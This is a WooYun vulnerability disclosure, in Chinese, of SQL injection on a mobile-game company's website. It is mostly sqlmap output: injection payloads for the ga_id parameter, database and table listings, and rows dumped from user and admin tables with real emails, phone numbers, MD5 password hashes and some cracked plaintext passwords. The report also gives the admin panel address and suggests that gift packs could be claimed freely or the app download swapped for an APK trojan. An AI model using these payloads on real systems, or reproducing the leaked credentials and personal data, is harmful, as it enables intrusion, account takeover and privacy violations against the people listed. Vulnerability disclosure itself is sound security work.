当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0131043

漏洞标题:某手游网站SQL注入已进后台 (6w会员信息泄露)

相关厂商:上海草花互动网络科技有限公司

漏洞作者: me1ody

提交时间:2015-08-04 13:56

修复时间:2015-09-21 09:42

公开时间:2015-09-21 09:42

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:12

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-04: 细节已通知厂商并且等待厂商处理中
2015-08-07: 厂商已经确认,细节仅向厂商公开
2015-08-17: 细节向核心白帽子及相关领域专家公开
2015-08-27: 细节向普通白帽子公开
2015-09-06: 细节向实习白帽子公开
2015-09-21: 细节向公众公开

简要描述:

会员信息泄露
很多充值用户
可以洗钱
可以上传apk木马

详细说明:

注入点

http://www.caohua.com/zoning/zo_ga_list?ga_id=1


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: ga_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ga_id=1 AND 3417=3417
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: ga_id=1 AND (SELECT 4565 FROM(SELECT COUNT(*),CONCAT(0x716a627671,(SELECT (ELT(4565=4565,1))),0x71717a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (SELECT)
Payload: ga_id=1 AND (SELECT * FROM (SELECT(SLEEP(10)))MRAA)
---
web server operating system: Windows
web application technology: ASP.NET, Nginx, PHP 5.4.24
back-end DBMS: MySQL >= 5.0.0
available databases [4]:
[*] `\\ckc\x0b`
[*] `\x15\x11%I\x1b&'iJ`
[*] `J\x03"\x13S`
[*] information_schema


发现乱码 查询下当前库

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: ga_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ga_id=1 AND 3417=3417
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: ga_id=1 AND (SELECT 4565 FROM(SELECT COUNT(*),CONCAT(0x716a627671,(SELECT (ELT(4565=4565,1))),0x71717a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (SELECT)
Payload: ga_id=1 AND (SELECT * FROM (SELECT(SLEEP(10)))MRAA)
---
web server operating system: Windows
web application technology: ASP.NET, Nginx, PHP 5.4.24
back-end DBMS: MySQL >= 5.0.0
current database: 'phpcaohua'


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: ga_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ga_id=1 AND 3417=3417
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: ga_id=1 AND (SELECT 4565 FROM(SELECT COUNT(*),CONCAT(0x716a627671,(SELECT (ELT(4565=4565,1))),0x71717a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (SELECT)
Payload: ga_id=1 AND (SELECT * FROM (SELECT(SLEEP(10)))MRAA)
---
web server operating system: Windows
web application technology: ASP.NET, Nginx, PHP 5.4.24
back-end DBMS: MySQL >= 5.0.0
Database: phpcaohua
[45 tables]
+-----------------------+
| c_account |
| c_active_use |
| c_ads_class |
| c_article |
| c_article_type |
| c_branch |
| c_certified |
| c_channel_account |
| c_channel_bank |
| c_channel_pick |
| c_chat_record |
| c_comment |
| c_data_channel_total |
| c_data_uchannel_total |
| c_down_games |
| c_focus |
| c_game_info |
| c_game_type |
| c_games_pay |
| c_games_user |
| c_group_buy |
| c_group_level |
| c_login_admin |
| c_maintain_vip |
| c_manage_user |
| c_package |
| c_package_rev |
| c_package_type |
| c_pay_order |
| c_pl_access |
| c_pl_game_users |
| c_pl_pay_order |
| c_play_appoint |
| c_privilege |
| c_produce |
| c_produce_sale |
| c_question |
| c_question_write |
| c_rank |
| c_role |
| c_role_privilege |
| c_user |
| c_user_v |
| c_wealth_log |
| c_ztactivs_user |
+-----------------------+
Database: phpcaohua
+-------------------+---------+
| Table | Entries |
+-------------------+---------+
| c_package | 212311 |
| c_wealth_log | 198542 |
| c_package_rev | 155527 |
| c_user | 62338 |
| c_account | 62287 |
| c_pay_order | 34990 |
| c_question_write | 1248 |
| c_game_info | 48 |
| c_focus | 41 |
| c_ads_class | 22 |
| c_article_type | 20 |
| c_rank | 11 |
| c_branch | 7 |
| c_group_buy | 6 |
| c_maintain_vip | 6 |
| c_role | 5 |
| c_group_level | 4 |
| c_produce | 4 |
| c_channel_account | 1 |
+-------------------+---------+


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: ga_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ga_id=1 AND 3417=3417
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: ga_id=1 AND (SELECT 4565 FROM(SELECT COUNT(*),CONCAT(0x716a627671,(SELECT (ELT(4565=4565,1))),0x71717a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (SELECT)
Payload: ga_id=1 AND (SELECT * FROM (SELECT(SLEEP(10)))MRAA)
---
web server operating system: Windows
web application technology: ASP.NET, Nginx, PHP 5.4.24
back-end DBMS: MySQL >= 5.0.0
Database: phpcaohua
Table: c_user
[12 entries]
+-------------------+---------------------------------------------+----------------------------------+-------------+
| email | password | uce_pass | login_name |
+-------------------+---------------------------------------------+----------------------------------+-------------+
| NULL | E25B2B1BAC165D1949405E9B6DC8FC15 | 00002961 | joycegong |
| 2856023741@qq.com | AFAB92058AA1762FA6D58C90CC6B6FF5 | 0196454653c67b25b82711c686a66817 | 15190225806 |
| zsj999@163.com | 2D3CD0366343ACCC04B8AF4C88F803D1 | NULL | 85357858aa |
| NULL | 3B814C816BC7C23A11CA8CC52ECB0F04 | fjm15190225806 | 18227201760 |
| NULL | 5E1A52C3A8C0BD0D6BABAB68D1E71D05 | NULL | 13754637142 |
| <blank> | 7D92D378826BAFAFE7A3DFA0C2A11884 | NULL | 17701620813 |
| NULL | 7B0DBBEBCE6EB50E8865CC3B23B1045F | NULL | 13739571720 |
| 105322355@qq.com | 7FEF6171469E80D32C0559F88B377245 (admin888) | admin888 | 13753522369 |
| NULL | DD4B21E9EF71E1291183A46B913AE6F2 (00000000) | 00000000 | admin |
| NULL | F805CF9589D118D8B804DF78F0AA67DA | 211847 | 4352698 |
| NULL | E10ADC3949BA59ABBE56E057F20F883E (123456) | 123456 | 2726084746 |
| NULL | A68AE418CFD0110DACEFCB0A39970A56 | lw851227 | jiulidao |
+-------------------+---------------------------------------------+----------------------------------+-------------+


看下管理员

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: ga_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ga_id=1 AND 3417=3417
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: ga_id=1 AND (SELECT 4565 FROM(SELECT COUNT(*),CONCAT(0x716a627671,(SELECT (ELT(4565=4565,1))),0x71717a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (SELECT)
Payload: ga_id=1 AND (SELECT * FROM (SELECT(SLEEP(10)))MRAA)
---
web server operating system: Windows
web application technology: ASP.NET, Nginx, PHP 5.4.24
back-end DBMS: MySQL >= 5.0.0
Database: phpcaohua
Table: c_manage_user
[8 entries]
+-------------------------------------------+--------------+------------------+---------------+
| manage_pass | manage_user | manage_email | manage_mobile |
+-------------------------------------------+--------------+------------------+---------------+
| 6e0a72004b1c7ef6f34ca5604ebadcb2 | caohuahupeng | | 18711063293 |
| 759a73c078112460fae616557770fd04 | 28yAndyFei | | 13787173861 |
| e10adc3949ba59abbe56e057f20f883e (123456) | cindy2140 | | 18621761232 |
| 65fc5b5480d6da94787380c8c6c523b9 | | fulei@caohua.com | 18666663256 |
| 0399f77aa65c238918b841dd3a1f028e | | | |
+-------------------------------------------+--------------+------------------+---------------+


后台地址

http://www.caohua.com/admin.php


礼包任意领

QQ截图20150802110056.png


此处可以更换apk木马 后果很严重

QQ截图20150802110421.png


土豪很多里面好多有钱的

QQ截图20150802112910.png


来看看VIP10的

QQ截图20150802115151.png

漏洞证明:

礼包任意领

QQ截图20150802110056.png


此处可以更换apk木马 后果很严重

QQ截图20150802110421.png


土豪很多里面好多有钱的

QQ截图20150802112910.png


来看看VIP10的

QQ截图20150802115151.png

修复方案:

希望厂商重视起来否则很严重

版权声明:转载请注明来源 me1ody@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-08-07 09:40

厂商回复:

CNVD确认并复现所述情况,已经由CNVD通过网站公开联系方式(或以往建立的处置渠道)向网站管理单位(软件生产厂商)通报。

最新状态:

暂无